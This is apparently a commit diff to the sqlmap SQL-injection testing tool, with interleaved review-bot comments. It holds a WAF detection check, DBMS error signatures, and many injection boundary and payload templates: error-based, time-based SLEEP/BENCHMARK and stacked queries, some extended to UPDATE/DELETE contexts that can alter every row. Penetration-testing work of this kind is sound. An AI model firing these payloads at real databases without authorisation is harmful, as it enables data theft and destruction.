See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "NSFOCUS Web Application Firewall (NSFOCUS)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector)
retval = re.search(r"NSFocus", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
if retval:
break
return retval


@@ -31,6 +31,7 @@ Tag: <boundary>
6: TOP
7: Table name
8: Column name
9: Pre-WHERE (non-query)
A comma separated list of these values is also possible.
@@ -80,7 +81,7 @@ Formats:
<where>1,2</where>
<ptype>1</ptype>
<prefix>)</prefix>
<suffix></suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -89,7 +90,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>')</prefix>
<suffix></suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -98,7 +99,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>'</prefix>
<suffix></suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -107,7 +108,7 @@ Formats:
<where>1,2</where>
<ptype>4</ptype>
<prefix>"</prefix>
<suffix></suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<!-- End of generic boundaries -->
@@ -406,7 +407,7 @@ Formats:
<where>1,2</where>
<ptype>1</ptype>
<prefix></prefix>
<suffix>-- [RANDSTR]</suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -422,56 +423,92 @@ Formats:
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
<boundary>
<level>5</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>4</ptype>
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<!-- End of pre-WHERE generic boundaries -->
@@ -482,7 +519,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -491,7 +528,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -500,7 +537,7 @@ Formats:
<where>1,2</where>
<ptype>1</ptype>
<prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -509,7 +546,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -518,7 +555,7 @@ Formats:
<where>1,2</where>
<ptype>4</ptype>
<prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -527,7 +564,7 @@ Formats:
<where>1,2</where>
<ptype>1</ptype>
<prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -536,7 +573,7 @@ Formats:
<where>1</where>
<ptype>1</ptype>
<prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -545,48 +582,10 @@ Formats:
<where>1</where>
<ptype>1</ptype>
<prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<!-- End of pre-WHERE derived table boundaries -->
<!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<!-- End of INSERT/UPDATE generic boundaries -->
<!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
<boundary>
<level>4</level>


@@ -7,6 +7,7 @@
<error regexp="Warning.*mysql_.*"/>
<error regexp="MySqlException \(0x"/>
<error regexp="valid MySQL result"/>
<error regexp="check the manual that corresponds to your MySQL server version"/>
<error regexp="MySqlClient\."/>
<error regexp="com\.mysql\.jdbc\.exceptions"/>
</dbms>
@@ -31,6 +32,7 @@
<error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
<error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
<error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
<error regexp="Microsoft SQL Native Client.*[0-9a-fA-F]{8}"/>
</dbms>
<!-- Microsoft Access -->
@@ -43,7 +45,7 @@
<!-- Oracle -->
<dbms value="Oracle">
<error regexp="\bORA-[0-9][0-9][0-9][0-9]"/>
<error regexp="\bORA-\d{5}"/>
<error regexp="Oracle error"/>
<error regexp="Oracle.*Driver"/>
<error regexp="Warning.*\Woci_.*"/>
@@ -55,7 +57,7 @@
<error regexp="CLI Driver.*DB2"/>
<error regexp="DB2 SQL error"/>
<error regexp="\bdb2_\w+\("/>
<error regexp="(?i)SQLSTATE.+SQLCODE"/>
<error regexp="SQLSTATE.+SQLCODE"/>
</dbms>
<!-- Informix -->
@@ -87,7 +89,7 @@
<!-- Sybase -->
<dbms value="Sybase">
<error regexp="(?i)Warning.*sybase.*"/>
<error regexp="Warning.*sybase.*"/>
<error regexp="Sybase message"/>
<error regexp="Sybase.*Server message.*"/>
<error regexp="SybSQLException"/>
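Review bot: The DB2 and Sybase signatures appear to lose their inline `(?i)` flag (`SQLSTATE.+SQLCODE`, `Warning.*sybase.*`), assuming the second line of each printed pair is the new side, so case-insensitive matching now depends entirely on the flags the loading code passes when it applies these patterns. That code is not visible on this page. If it does match case-insensitively for every entry, a comment at the top of the file such as `<!-- All regexp values are matched case-insensitively by the loader; do not add inline (?i) -->` would record the convention and keep the flag from being re-added piecemeal. If it does not, these two entries silently stop matching lower-case error text. The trailing `.*` in `Warning.*sybase.*` also adds nothing if the patterns are used with a search rather than a full match.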


@@ -53,6 +53,7 @@ Tag: <test>
6: TOP
7: Table name
8: Column name
9: Pre-WHERE (non-query)
A comma separated list of these values is also possible.
@@ -159,7 +160,7 @@ Tag: <test>
<stype>1</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
@@ -175,7 +176,7 @@ Tag: <test>
<stype>1</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [INFERENCE]</vector>
<request>
@@ -191,7 +192,7 @@ Tag: <test>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR NOT [INFERENCE]</vector>
<request>
@@ -212,7 +213,7 @@ Tag: <test>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
@@ -229,7 +230,7 @@ Tag: <test>
<vector>OR [INFERENCE]</vector>
<request>
<payload>OR [RANDNUM]=[RANDNUM]</payload>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
@@ -246,7 +247,7 @@ Tag: <test>
<vector>OR NOT [INFERENCE]</vector>
<request>
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
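Review bot: The new legend entry `9: Pre-WHERE (non-query)` is too terse for what the following hunks do with it. The OR-based tests (`OR [INFERENCE]`, `OR NOT [INFERENCE]`) are extended from clause `1` to `1,9`, and in a non-query statement (presumably UPDATE or DELETE) an OR condition that evaluates true can affect every row of the table under test. These tests keep `<risk>3</risk>`, so they remain opt-in, but the legend should say so, e.g. `9: Pre-WHERE (non-query, e.g. UPDATE/DELETE; OR-based tests on this clause can modify all rows, keep them at risk 3)`. The same applies to the OR variants that gain clause 9 in the other payload files of this commit. The `<test>` elements begin and end outside these hunks, so their titles and DBMS details cannot be checked here.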


@@ -7,7 +7,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
<request>
@@ -31,7 +31,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where>
<vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
@@ -56,7 +56,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request>
@@ -80,7 +80,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where>
<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
@@ -105,7 +105,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request>
@@ -129,7 +129,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where>
<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
@@ -154,7 +154,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request>
@@ -174,7 +174,7 @@
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request>
@@ -194,7 +194,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request>
@@ -219,7 +219,7 @@
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request>
@@ -243,7 +243,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request>
@@ -268,7 +268,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request>
@@ -293,7 +293,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
<request>
@@ -313,7 +313,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request>
@@ -332,7 +332,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request>
@@ -351,7 +351,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@@ -372,7 +372,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@@ -393,7 +393,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@@ -414,7 +414,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@@ -435,7 +435,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request>
@@ -454,7 +454,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request>
@@ -473,7 +473,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -493,7 +493,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -513,7 +513,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -532,7 +532,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -551,7 +551,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -570,7 +570,7 @@
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -589,7 +589,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -608,7 +608,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -655,7 +655,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
<request>
@@ -679,7 +679,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
<request>
@@ -703,7 +703,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
<request>
@@ -727,7 +727,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request>
@@ -747,7 +747,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request>
@@ -771,7 +771,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request>
@@ -790,7 +790,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request>
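Review bot: Clause value `9` is added to every test in this file with no in-file explanation of what it means. None of the visible hunks touches a legend, and the only description on this page is the `9: Pre-WHERE (non-query)` line in another file's `Tag: <test>` header comment. A one-line comment near the top of this file, such as `<!-- clause 9 = Pre-WHERE (non-query); see the clause legend under "Tag: <test>" -->`, would let a maintainer read these entries without hunting for it. The edit is also applied on two different bases (`1,2,3` becoming `1,2,3,9`, and `1` becoming `1,9`); if that split is deliberate, the same comment is the place to say why. Each `<test>` element starts and ends outside its hunk.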


@@ -450,7 +450,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@@ -470,7 +470,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@@ -571,7 +571,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
@@ -591,7 +591,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>


@@ -7,7 +7,7 @@
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -27,7 +27,7 @@
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -47,7 +47,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -68,7 +68,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -89,7 +89,7 @@
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -109,7 +109,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -129,7 +129,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -150,7 +150,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -171,7 +171,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -191,7 +191,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
